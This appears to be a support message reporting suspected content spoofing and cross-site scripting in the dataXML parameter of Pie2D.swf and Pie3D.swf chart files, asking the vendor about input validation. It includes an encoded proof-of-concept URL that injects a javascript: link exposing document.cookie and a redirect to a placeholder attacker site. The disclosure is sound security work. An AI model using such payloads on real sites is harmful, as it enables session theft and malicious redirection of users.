Michelle

We are thinking the "dataXML" parameter used by Pie2D.swf and Pie3D.swf has Content Spoofing and Cross Site Scripting vulnerabilities. It seems that it does not currently validate data passed to it and allows an attacker to alter any chart hosted within the current domain and include malicious javascript that will execute when a user interacts with the altered chart. Here is an example using Pie2D.swf. The same applies to Pie3D.swf. This is not a live example because I used fake domains. https://your.domain.com/your/path/to/swf/Pie2D.swf?chartWidth=290&chartHeight=160&debugMode=0&DOMId=fusion_chart&registerWithJS=1&scaleMode=noScale〈=EN&dataXML=%3Cchart%20caption=%27Security%20Assessment,%20Inc.%27%20subcaption=%22Fusion%20Chart%20Content%20Spoofing%20and%20XSS%22%20showPercentageInLabel=%271%27%20showValues=%270%27%20showLabels=%271%27%20showLegend=%271%27%3E%3Cset%20value=%2714.94%27%20label=%27Redirection%27%20color=%27429EAD%27%20link=%27http://www.hackersite.com%27/%3E%3Cset%20value=%2719.17%27%20label=%27XSS!%27%20color=%274249AD%27%20link=%22javascript:confirm%28%27Security%20Assessment,%20Inc.%5Cn%5CnAn%20attacker%20has%20just%20captured%20your%20session.%5Cn%5Cn%27%252bdocument.cookie%29%22/%3E%3Cset%20value=%277.14%27%20label=%27Key%20Lime%27%20color=%27AD42A2%27/%3E%3Cset%20value=%277.75%27%20label=%27Apple%27%20color=%27D4AC31%27/%3E%3C/chart%3E

Is there any type of data validation that is performed for the dataXML parameter that is passed to the Pie2D.swf or Pie3D.swf files? We have concerns about the ability to pass malicious javascript in this parameter.